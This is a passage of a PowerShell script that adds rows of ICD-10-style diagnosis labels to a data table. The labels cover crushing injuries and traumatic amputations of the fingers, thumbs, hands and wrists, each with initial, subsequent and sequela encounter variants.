encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right thumb","Crushing injury of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left thumb","Crushing injury of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left thumb","Crushing injury of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left thumb","Crushing injury of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified finger(s)","Crushing injury of unspecified finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified finger(s)","Crushing injury of unspecified finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified finger(s)","Crushing injury of unspecified finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right index finger","Crushing injury of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right index finger","Crushing injury of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right index finger","Crushing injury of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left index finger","Crushing injury of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left index finger","Crushing injury of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left index finger","Crushing injury of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right middle finger","Crushing injury of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right middle finger","Crushing injury of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right middle finger","Crushing injury of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left middle finger","Crushing injury of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left middle finger","Crushing injury of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left middle finger","Crushing injury of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right ring finger","Crushing injury of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right ring finger","Crushing injury of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right ring finger","Crushing injury of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left ring finger","Crushing injury of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left ring finger","Crushing injury of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left ring finger","Crushing injury of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right little finger","Crushing injury of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right little finger","Crushing injury of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right little finger","Crushing injury of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left little finger","Crushing injury of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left little finger","Crushing injury of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left little finger","Crushing injury of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of other finger","Crushing injury of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of other finger","Crushing injury of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of other finger","Crushing injury of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hand","Crushing injury of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hand","Crushing injury of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hand","Crushing injury of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hand","Crushing injury of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hand","Crushing injury of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hand","Crushing injury of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hand","Crushing injury of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hand","Crushing injury of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hand","Crushing injury of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified wrist","Crushing injury of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified wrist","Crushing injury of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified wrist","Crushing injury of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right wrist","Crushing injury of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right wrist","Crushing injury of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right wrist","Crushing injury of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left wrist","Crushing injury of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left wrist","Crushing injury of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left wrist","Crushing injury of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified wrist and hand","Crushing injury of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified wrist and hand","Crushing injury of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified wrist and hand","Crushing injury of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right wrist and hand","Crushing injury of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right wrist and hand","Crushing injury of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right wrist and hand","Crushing injury of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left wrist and hand","Crushing injury of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left wrist and hand","Crushing injury of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left wrist and hand","Crushing injury of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of unspecified wrist, hand and fingers","Crushing injury of unspecified part(s) of unspecified wrist, hand and fingers, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of unspecified wrist, hand and fingers","Crushing injury of unspecified part(s) of unspecified wrist, hand and fingers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of unspecified wrist, hand and fingers","Crushing injury of unspecified part(s) of unspecified wrist, hand and fingers, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of right wrist, hand and fingers","Crushing injury of unspecified part(s) of right wrist, hand and fingers, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of right wrist, hand and fingers","Crushing injury of unspecified part(s) of right wrist, hand and fingers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of right wrist, hand and fingers","Crushing injury of unspecified part(s) of right wrist, hand and fingers, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of left wrist, hand and fingers","Crushing injury of unspecified part(s) of left wrist, hand and fingers, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of left wrist, hand and fingers","Crushing injury of unspecified part(s) of left wrist, hand and fingers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified part(s) of left wrist, hand and fingers","Crushing injury of unspecified part(s) of left wrist, hand and fingers, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right thumb","Complete traumatic metacarpophalangeal amputation of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right thumb","Complete traumatic metacarpophalangeal amputation of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right thumb","Complete traumatic metacarpophalangeal amputation of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left thumb","Complete traumatic metacarpophalangeal amputation of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left thumb","Complete traumatic metacarpophalangeal amputation of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left thumb","Complete traumatic metacarpophalangeal amputation of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of unspecified thumb","Complete traumatic metacarpophalangeal amputation of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of unspecified thumb","Complete traumatic metacarpophalangeal amputation of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of unspecified thumb","Complete traumatic metacarpophalangeal amputation of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right thumb","Partial traumatic metacarpophalangeal amputation of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right thumb","Partial traumatic metacarpophalangeal amputation of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right thumb","Partial traumatic metacarpophalangeal amputation of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left thumb","Partial traumatic metacarpophalangeal amputation of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left thumb","Partial traumatic metacarpophalangeal amputation of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left thumb","Partial traumatic metacarpophalangeal amputation of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of unspecified thumb","Partial traumatic metacarpophalangeal amputation of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of unspecified thumb","Partial traumatic metacarpophalangeal amputation of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of unspecified thumb","Partial traumatic metacarpophalangeal amputation of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right index finger","Complete traumatic metacarpophalangeal amputation of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right index finger","Complete traumatic metacarpophalangeal amputation of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right index finger","Complete traumatic metacarpophalangeal amputation of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left index finger","Complete traumatic metacarpophalangeal amputation of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left index finger","Complete traumatic metacarpophalangeal amputation of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left index finger","Complete traumatic metacarpophalangeal amputation of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right middle finger","Complete traumatic metacarpophalangeal amputation of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right middle finger","Complete traumatic metacarpophalangeal amputation of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right middle finger","Complete traumatic metacarpophalangeal amputation of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left middle finger","Complete traumatic metacarpophalangeal amputation of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left middle finger","Complete traumatic metacarpophalangeal amputation of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left middle finger","Complete traumatic metacarpophalangeal amputation of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right ring finger","Complete traumatic metacarpophalangeal amputation of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right ring finger","Complete traumatic metacarpophalangeal amputation of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right ring finger","Complete traumatic metacarpophalangeal amputation of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left ring finger","Complete traumatic metacarpophalangeal amputation of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left ring finger","Complete traumatic metacarpophalangeal amputation of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left ring finger","Complete traumatic metacarpophalangeal amputation of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right little finger","Complete traumatic metacarpophalangeal amputation of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right little finger","Complete traumatic metacarpophalangeal amputation of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of right little finger","Complete traumatic metacarpophalangeal amputation of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left little finger","Complete traumatic metacarpophalangeal amputation of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left little finger","Complete traumatic metacarpophalangeal amputation of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of left little finger","Complete traumatic metacarpophalangeal amputation of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of other finger","Complete traumatic metacarpophalangeal amputation of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of other finger","Complete traumatic metacarpophalangeal amputation of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of other finger","Complete traumatic metacarpophalangeal amputation of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of unspecified finger","Complete traumatic metacarpophalangeal amputation of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of unspecified finger","Complete traumatic metacarpophalangeal amputation of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic metacarpophalangeal amputation of unspecified finger","Complete traumatic metacarpophalangeal amputation of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right index finger","Partial traumatic metacarpophalangeal amputation of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right index finger","Partial traumatic metacarpophalangeal amputation of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right index finger","Partial traumatic metacarpophalangeal amputation of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left index finger","Partial traumatic metacarpophalangeal amputation of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left index finger","Partial traumatic metacarpophalangeal amputation of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left index finger","Partial traumatic metacarpophalangeal amputation of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right middle finger","Partial traumatic metacarpophalangeal amputation of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right middle finger","Partial traumatic metacarpophalangeal amputation of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right middle finger","Partial traumatic metacarpophalangeal amputation of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left middle finger","Partial traumatic metacarpophalangeal amputation of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left middle finger","Partial traumatic metacarpophalangeal amputation of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left middle finger","Partial traumatic metacarpophalangeal amputation of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right ring finger","Partial traumatic metacarpophalangeal amputation of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right ring finger","Partial traumatic metacarpophalangeal amputation of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right ring finger","Partial traumatic metacarpophalangeal amputation of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left ring finger","Partial traumatic metacarpophalangeal amputation of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left ring finger","Partial traumatic metacarpophalangeal amputation of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left ring finger","Partial traumatic metacarpophalangeal amputation of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right little finger","Partial traumatic metacarpophalangeal amputation of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right little finger","Partial traumatic metacarpophalangeal amputation of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of right little finger","Partial traumatic metacarpophalangeal amputation of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left little finger","Partial traumatic metacarpophalangeal amputation of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left little finger","Partial traumatic metacarpophalangeal amputation of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of left little finger","Partial traumatic metacarpophalangeal amputation of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of other finger","Partial traumatic metacarpophalangeal amputation of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of other finger","Partial traumatic metacarpophalangeal amputation of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of other finger","Partial traumatic metacarpophalangeal amputation of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of unspecified finger","Partial traumatic metacarpophalangeal amputation of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of unspecified finger","Partial traumatic metacarpophalangeal amputation of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic metacarpophalangeal amputation of unspecified finger","Partial traumatic metacarpophalangeal amputation of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right hand at wrist level","Complete traumatic amputation of right hand at wrist level, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right hand at wrist level","Complete traumatic amputation of right hand at wrist level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right hand at wrist level","Complete traumatic amputation of right hand at wrist level, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left hand at wrist level","Complete traumatic amputation of left hand at wrist level, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left hand at wrist level","Complete traumatic amputation of left hand at wrist level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left hand at wrist level","Complete traumatic amputation of left hand at wrist level, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified hand at wrist level","Complete traumatic amputation of unspecified hand at wrist level, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified hand at wrist level","Complete traumatic amputation of unspecified hand at wrist level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified hand at wrist level","Complete traumatic amputation of unspecified hand at wrist level, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right hand at wrist level","Partial traumatic amputation of right hand at wrist level, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right hand at wrist level","Partial traumatic amputation of right hand at wrist level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right hand at wrist level","Partial traumatic amputation of right hand at wrist level, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left hand at wrist level","Partial traumatic amputation of left hand at wrist level, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left hand at wrist level","Partial traumatic amputation of left hand at wrist level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left hand at wrist level","Partial traumatic amputation of left hand at wrist level, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified hand at wrist level","Partial traumatic amputation of unspecified hand at wrist level, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified hand at wrist level","Partial traumatic amputation of unspecified hand at wrist level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified hand at wrist level","Partial traumatic amputation of unspecified hand at wrist level, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right thumb","Complete traumatic transphalangeal amputation of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right thumb","Complete traumatic transphalangeal amputation of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right thumb","Complete traumatic transphalangeal amputation of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left thumb","Complete traumatic transphalangeal amputation of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left thumb","Complete traumatic transphalangeal amputation of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left thumb","Complete traumatic transphalangeal amputation of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of unspecified thumb","Complete traumatic transphalangeal amputation of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of unspecified thumb","Complete traumatic transphalangeal amputation of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of unspecified thumb","Complete traumatic transphalangeal amputation of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right thumb","Partial traumatic transphalangeal amputation of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right thumb","Partial traumatic transphalangeal amputation of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right thumb","Partial traumatic transphalangeal amputation of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left thumb","Partial traumatic transphalangeal amputation of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left thumb","Partial traumatic transphalangeal amputation of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left thumb","Partial traumatic transphalangeal amputation of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of unspecified thumb","Partial traumatic transphalangeal amputation of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of unspecified thumb","Partial traumatic transphalangeal amputation of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of unspecified thumb","Partial traumatic transphalangeal amputation of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right index finger","Complete traumatic transphalangeal amputation of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right index finger","Complete traumatic transphalangeal amputation of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right index finger","Complete traumatic transphalangeal amputation of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left index finger","Complete traumatic transphalangeal amputation of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left index finger","Complete traumatic transphalangeal amputation of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left index finger","Complete traumatic transphalangeal amputation of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right middle finger","Complete traumatic transphalangeal amputation of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right middle finger","Complete traumatic transphalangeal amputation of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right middle finger","Complete traumatic transphalangeal amputation of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left middle finger","Complete traumatic transphalangeal amputation of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left middle finger","Complete traumatic transphalangeal amputation of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left middle finger","Complete traumatic transphalangeal amputation of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right ring finger","Complete traumatic transphalangeal amputation of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right ring finger","Complete traumatic transphalangeal amputation of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right ring finger","Complete traumatic transphalangeal amputation of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left ring finger","Complete traumatic transphalangeal amputation of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left ring finger","Complete traumatic transphalangeal amputation of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left ring finger","Complete traumatic transphalangeal amputation of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right little finger","Complete traumatic transphalangeal amputation of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right little finger","Complete traumatic transphalangeal amputation of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of right little finger","Complete traumatic transphalangeal amputation of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left little finger","Complete traumatic transphalangeal amputation of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left little finger","Complete traumatic transphalangeal amputation of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of left little finger","Complete traumatic transphalangeal amputation of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of other finger","Complete traumatic transphalangeal amputation of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of other finger","Complete traumatic transphalangeal amputation of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of other finger","Complete traumatic transphalangeal amputation of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of unspecified finger","Complete traumatic transphalangeal amputation of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of unspecified finger","Complete traumatic transphalangeal amputation of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transphalangeal amputation of unspecified finger","Complete traumatic transphalangeal amputation of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right index finger","Partial traumatic transphalangeal amputation of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right index finger","Partial traumatic transphalangeal amputation of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right index finger","Partial traumatic transphalangeal amputation of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left index finger","Partial traumatic transphalangeal amputation of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left index finger","Partial traumatic transphalangeal amputation of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic 